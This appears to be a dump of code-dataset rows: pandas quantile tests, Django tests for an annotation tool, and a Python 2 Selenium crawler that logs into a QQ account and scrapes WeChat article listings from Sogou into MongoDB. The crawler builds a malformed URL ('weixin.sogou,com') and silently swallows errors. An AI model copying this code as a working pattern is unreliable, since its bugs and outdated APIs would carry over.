df = DataFrame({"a": np.arange(1, 6.0), "b": np.arange(1, 6.0)})
df.iloc[-1, 1] = np.nan
res = df.quantile(0.5)
exp = Series([3.0, 2.5], index=["a", "b"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5, 0.75])
exp = DataFrame({"a": [3.0, 4.0], "b": [2.5, 3.25]}, index=[0.5, 0.75])
tm.assert_frame_equal(res, exp)
res = df.quantile(0.5, axis=1)
exp = Series(np.arange(1.0, 6.0), name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5, 0.75], axis=1)
exp = DataFrame([np.arange(1.0, 6.0)] * 2, index=[0.5, 0.75])
tm.assert_frame_equal(res, exp)
# full-nan column
df["b"] = np.nan
res = df.quantile(0.5)
exp = Series([3.0, np.nan], index=["a", "b"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5, 0.75])
exp = DataFrame({"a": [3.0, 4.0], "b": [np.nan, np.nan]}, index=[0.5, 0.75])
tm.assert_frame_equal(res, exp)
def test_quantile_nat(self):
# full NaT column
df = DataFrame({"a": [pd.NaT, pd.NaT, pd.NaT]})
res = df.quantile(0.5, numeric_only=False)
exp = Series([pd.NaT], index=["a"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5], numeric_only=False)
exp = DataFrame({"a": [pd.NaT]}, index=[0.5])
tm.assert_frame_equal(res, exp)
# mixed non-null / full null column
df = DataFrame(
{
"a": [
Timestamp("2012-01-01"),
Timestamp("2012-01-02"),
Timestamp("2012-01-03"),
],
"b": [pd.NaT, pd.NaT, pd.NaT],
}
)
res = df.quantile(0.5, numeric_only=False)
exp = Series([Timestamp("2012-01-02"), pd.NaT], index=["a", "b"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5], numeric_only=False)
exp = DataFrame(
[[Timestamp("2012-01-02"), pd.NaT]], index=[0.5], columns=["a", "b"]
)
tm.assert_frame_equal(res, exp)
def test_quantile_empty_no_rows(self):
# floats
df = DataFrame(columns=["a", "b"], dtype="float64")
res = df.quantile(0.5)
exp = Series([np.nan, np.nan], index=["a", "b"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5])
exp = DataFrame([[np.nan, np.nan]], columns=["a", "b"], index=[0.5])
tm.assert_frame_equal(res, exp)
# FIXME (gives empty frame in 0.18.1, broken in 0.19.0)
# res = df.quantile(0.5, axis=1)
# res = df.quantile([0.5], axis=1)
# ints
df = DataFrame(columns=["a", "b"], dtype="int64")
# FIXME (gives empty frame in 0.18.1, broken in 0.19.0)
# res = df.quantile(0.5)
# datetimes
df = DataFrame(columns=["a", "b"], dtype="datetime64[ns]")
# FIXME (gives NaNs instead of NaT in 0.18.1 or 0.19.0)
# res = df.quantile(0.5, numeric_only=False)
def test_quantile_empty_no_columns(self):
# GH#23925 _get_numeric_data may drop all columns
df = DataFrame(pd.date_range("1/1/18", periods=5))
df.columns.name = "captain tightpants"
result = df.quantile(0.5)
expected = Series([], index=[], name=0.5, dtype=np.float64)
expected.index.name = "captain tightpants"
tm.assert_series_equal(result, expected)
result = df.quantile([0.5])
expected = DataFrame([], index=[0.5], columns=[])
expected.columns.name = "captain tightpants"
tm.assert_frame_equal(result, expected)
def test_quantile_item_cache(self):
# previous behavior incorrect retained an invalid _item_cache entry
df = DataFrame(np.random.randn(4, 3), columns=["A", "B", "C"])
df["D"] = df["A"] * 2
ser = df["A"]
assert len(df._mgr.blocks) == 2
df.quantile(numeric_only=False)
ser.values[0] = 99
assert df.iloc[0, 0] == df["A"][0]
| bsd-3-clause | -840,498,865,969,401,900 | 33.39548 | 86 | 0.481001 | false |
Taraka16/neonion | common/tests.py | 1 | 10396 | from django.test import TestCase
from uri import generate_uri
from statements import Annotation
from annotation import add_resource_uri, SemanticAnnotationValidator, pre_process_annotation
from exceptions import InvalidAnnotationError, InvalidResourceTypeError
from vocab import neonion, OpenAnnotation
from cms import ContentSystem
from django.core.validators import URLValidator
from documents.tests import create_test_document
from common.statements import metadata_statement
class AnnotationValidationTestCase(TestCase):
def setUp(self):
self.valid = {
'highlight': {
'oa': {'motivatedBy': OpenAnnotation.Motivations.highlighting.value}
},
'comment': {
'text': 'Comment text',
'oa': {
'motivatedBy': OpenAnnotation.Motivations.commenting.value,
'hasBody': {'type': OpenAnnotation.DocumentTypes.text.value}
},
},
'classification': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.classifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
},
'rdf': {
'typeof': 'http://neonion.org/concept1',
'label': 'Name of the instance'
}
},
'identification': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.identifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
},
'rdf': {
'uri': 'http://neonion.org/instance1',
'typeof': 'http://neonion.org/concept1',
'label': 'Name of the instance'
}
},
'linking': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.linking.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
'hasTarget': {}
},
}
}
self.invalid = {
'noMotivation': {
'oa': {}
},
'commentWithoutBody': {
'oa': {'motivatedBy': OpenAnnotation.Motivations.commenting.value}
},
'commentWithInvalidBodyType': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.commenting.value,
'hasBody': {'type': 'someType'}
}
},
'classificationWithInvalidBodyType': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.classifying.value,
'hasBody': {'type': 'someType'},
}
},
'classificationWithoutConceptType': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.classifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
}
},
'linkingWithInvalidBodyType': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.linking.value,
'hasBody': {'type': 'someType'},
'hasTarget': {}
}
}
}
def test_valid_annotations(self):
validate = SemanticAnnotationValidator()
self.assertIsNone(validate(self.valid['comment']))
self.assertIsNone(validate(self.valid['highlight']))
self.assertIsNone(validate(self.valid['classification']))
self.assertIsNone(validate(self.valid['identification']))
self.assertIsNone(validate(self.valid['linking']))
def test_invalid_annotations(self):
validate = SemanticAnnotationValidator()
self.assertRaises(InvalidAnnotationError, validate, self.invalid['noMotivation'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['commentWithoutBody'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['commentWithInvalidBodyType'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['classificationWithInvalidBodyType'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['classificationWithoutConceptType'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['linkingWithInvalidBodyType'])
class AnnotationPreProcessTestCase(TestCase):
def setUp(self):
self.pre_process = {
'classification': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.classifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
},
'rdf': {
'typeof': 'http://neonion.org/concept1',
'label': 'Name of the instance'
}
},
'identification': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.identifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
},
'rdf': {
'typeof': 'http://neonion.org/concept1',
'label': 'Name of the instance'
}
}
}
def test_pre_process(self):
# following two calls ensures if a URI is added in pre-process
# (1) annotation is motivated by classification
annotation = pre_process_annotation(self.pre_process['classification'])
self.assertTrue('uri' in annotation['rdf'])
# (2) annotation is motivated by classification
annotation = pre_process_annotation(self.pre_process['identification'])
self.assertTrue('uri' in annotation['rdf'])
class UriTestCase(TestCase):
def setUp(self):
self.resourceType = "http://neonion.org/concept/person"
self.invalidResourceType = "person"
def test_equal_uri_mapping(self):
uri1 = generate_uri(resource_type=self.resourceType, name="Otto Hahn")
uri2 = generate_uri(resource_type=self.resourceType, name="Otto Hahn")
self.assertEqual(uri1, uri2)
def test_not_equal_uri_mapping(self):
uri1 = generate_uri(resource_type=self.resourceType, name="Otto Hahn")
uri2 = generate_uri(resource_type=self.resourceType, name="Max Planck")
self.assertNotEqual(uri1, uri2)
def test_random_uri_mapping(self):
uri1 = generate_uri(resource_type=self.resourceType)
uri2 = generate_uri(resource_type=self.resourceType)
self.assertNotEqual(uri1, uri2)
def test_invalid_uri_mapping(self):
self.assertRaises(InvalidResourceTypeError, generate_uri, resource_type=self.invalidResourceType)
class StatementsTestCase(TestCase):
def setUp(self):
self.noConceptAnnotation = {
"quote": "Otto Hahn"
}
self.conceptAnnotationWithoutURI = {
"quote": "Otto Hahn",
"oa": {
"hasBody": {
"type": "oa:SemanticTag"
}
},
"rdf": {
"label": "Name of resource",
"typeof": "http://neonion.org/concept/person"
}
}
self.conceptAnnotation = {
"quote": "Otto Hahn",
"oa": {
"hasBody": {
"type": "oa:SemanticTag"
}
},
"rdf": {
"label": "Name of resource",
"uri": "http://neonion.org/person/123456",
"typeof": "http://neonion.org/concept/person"
}
}
self.conceptAnnotationWithSameAs = {
"quote": "Otto Hahn",
"oa": {},
"rdf": {
"label": "Name of resource",
"uri": 'http://neonion.org/person/123456',
"typeof": "http://neonion.org/concept/person",
"sameAs": "http://de.dbpedia.org/page/Otto_Hahn"
}
}
self.test_general_document = create_test_document()
def test_no_semantic_annotation(self):
self.assertRaises(InvalidAnnotationError, Annotation.statement_about_resource, self.noConceptAnnotation)
def test_semantic_annotation(self):
statement = Annotation.statement_about_resource(self.conceptAnnotation)
self.assertTrue("rdf:type" in statement)
self.assertTrue("rdfs:label" in statement)
def test_semantic_annotation_with_same_as(self):
statement = Annotation.statement_about_resource(self.conceptAnnotationWithSameAs)
self.assertTrue("owl:sameAs" in statement)
def test_add_uri_to_invalid_annotation(self):
self.assertRaises(InvalidAnnotationError, add_resource_uri, self.noConceptAnnotation)
def test_add_uri_to_valid_annotation(self):
annotation = self.conceptAnnotationWithoutURI
self.assertFalse("uri" in annotation['rdf'])
annotation = add_resource_uri(self.conceptAnnotationWithoutURI)
self.assertTrue("uri" in annotation['rdf'])
def test_general_document(self):
statement = metadata_statement(self.test_general_document)
self.assertTrue("dc:title" in statement)
self.assertTrue("dc:creator" in statement)
self.assertTrue("dc:type" in statement)
class VocabTestCase(TestCase):
def test_valid_urls(self):
""" Tests whether the vocab contains only valid URLs. """
vocab = neonion()
vocab_uri = [
vocab.CONCEPT_SET, vocab.CONCEPT, vocab.LINKED_CONCEPT,
vocab.PROPERTY, vocab.LINKED_PROPERTY,
vocab.DOCUMENT, vocab.ANNOTATION_STORE_GRAPH
]
validate = URLValidator()
for uri in vocab_uri:
self.assertIsNone(validate(uri))
class ContentSystemTestCase(TestCase):
def test_abstract_cms(self):
cms = ContentSystem()
# expect NotImplementedError on all calls
self.assertRaises(NotImplementedError, cms.list)
self.assertRaises(NotImplementedError, cms.get_document, None)
self.assertRaises(NotImplementedError, cms.get_meta, None)
self.assertRaises(NotImplementedError, cms.search, None)
| gpl-2.0 | 4,945,973,575,964,803,000 | 37.361624 | 112 | 0.574933 | false |
jakobzhao/ashcrawler | core/wechat.py | 1 | 5809 | # !/usr/bin/python
# -*- coding: utf-8 -*-
#
# Created on April 12, 2016
# @author: Bo Zhao
# @email: [email protected]
# @website: http://yenching.org
# @organization: Harvard Kennedy School
import time
import platform
from pymongo import MongoClient, errors
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException, NoSuchElementException
from bs4 import BeautifulSoup
from log import *
from settings import TIMEOUT, TZCHINA, WC_NAME, WC_PSW
import datetime
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# Crawling pages from weixin.sogou.com
def wccrawler(keyword, project, address, port, username, password):
start = datetime.datetime.now()
log(NOTICE, 'Crawling WeChat with keyword %s....' % keyword)
if "Linux" in platform.platform():
browser = webdriver.PhantomJS(executable_path=r'/home/ubuntu/phantomjs-2.1.1-linux-x86_64/bin/phantomjs')
else:
browser = webdriver.PhantomJS(executable_path=r'C:\Workspace\phantomjs\bin\phantomjs.exe')
# firefox_profile = webdriver.FirefoxProfile()
# firefox_profile.set_preference('permissions.default.image', 2)
# firefox_profile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')
# browser = webdriver.Firefox(firefox_profile=firefox_profile)
browser.set_window_size(960, 1050)
browser.set_window_position(0, 0)
browser.set_page_load_timeout(TIMEOUT)
client = MongoClient(address, port)
db = client[project]
db.authenticate(username, password)
base_url = "http://weixin.sogou.com/"
while True:
try:
browser.get(base_url)
break
except TimeoutException:
# print 'time out after %d seconds when loading page' % TIMEOUT
# browser.execute_script('window.stop()')
log(NOTICE, "refreshing...")
WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.ID, 'loginBtn')))
browser.find_element_by_id('loginBtn').click()
time.sleep(2)
browser.switch_to.frame(0)
# browser.switch_to.frame(browser.find_element_by_id("ptlogin_iframe"))
time.sleep(2)
browser.switch_to.frame(0)
time.sleep(2)
browser.find_element_by_id('switcher_plogin').click()
# input username
user = WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.ID, 'u')))
user.clear()
user.send_keys(WC_NAME, Keys.ARROW_DOWN)
# input the passowrd
passwd = browser.find_element_by_id('p')
passwd.clear()
passwd.send_keys(WC_PSW, Keys.ARROW_DOWN)
# press click and then the vcode appears.
browser.find_element_by_class_name('login_button').click()
try:
time.sleep(3)
browser.find_element_by_class_name('login_button').click()
except:
pass
time.sleep(5)
browser.switch_to.default_content()
time.sleep(5)
try:
browser.find_element_by_id("indx-login")
except:
log(NOTICE, "unlogin")
log(NOTICE, "login")
log(NOTICE, 'Harvesting the new pages generated within the past 24 hours.')
while True:
try:
query = browser.find_element_by_id("upquery")
query.clear()
query.send_keys(keyword.decode('utf8'), Keys.ARROW_DOWN)
browser.find_element_by_class_name('swz').click()
time.sleep(5)
break
except TimeoutException:
browser.refresh()
log(NOTICE, 'refreshing')
browser.find_element_by_link_text(u'全部时间').click()
time.sleep(2)
browser.find_element_by_link_text(u'一天内').click()
time.sleep(5)
soup = BeautifulSoup(browser.page_source, 'html5lib')
i = 0
while soup.find(id='sogou_next') is not None:
soup = BeautifulSoup(browser.page_source, 'html5lib')
t_china = datetime.datetime.now(TZCHINA)
for item in soup.find_all("div", "txt-box"):
try:
title = item.find('h4').text
url = u'http://weixin.sogou,com' + item.h4.a.attrs['href']
abstract = item.p.text
user_name = item.find("a", "wx-name").attrs['title']
time_before = item.find("span", "time").text.split(")")[1]
except AttributeError:
log(WARNING, 'find an unusual page.')
continue
page_json = {
"type": "wechat",
"keyword": keyword,
"title": title.strip(),
"username": user_name,
"abstract": abstract.strip(),
"orig_url": url,
"url": url,
"created_at": t_china,
"time_before": time_before,
"page": i + 1
}
try:
db.pages.insert_one(page_json)
except errors.DuplicateKeyError:
log(NOTICE, 'This post has already been inserted.')
except:
pass
i += 1
print "page" + str(i) + " is processed: " + browser.current_url
# WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.LINK_TEXT, u'下一页')))
try:
browser.find_element_by_link_text(u'下一页').click()
time.sleep(10)
except NoSuchElementException:
log(NOTICE, "Reaching the last page.")
break
browser.close()
log(NOTICE, 'The completion of processing the keyword "%s". Time: %d sec(s)' % (keyword.decode('utf-8'), int((datetime.datetime.now() - start).seconds)))
| lgpl-3.0 | 1,400,240,208,662,310,000 | 34.048485 | 157 | 0.616635 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.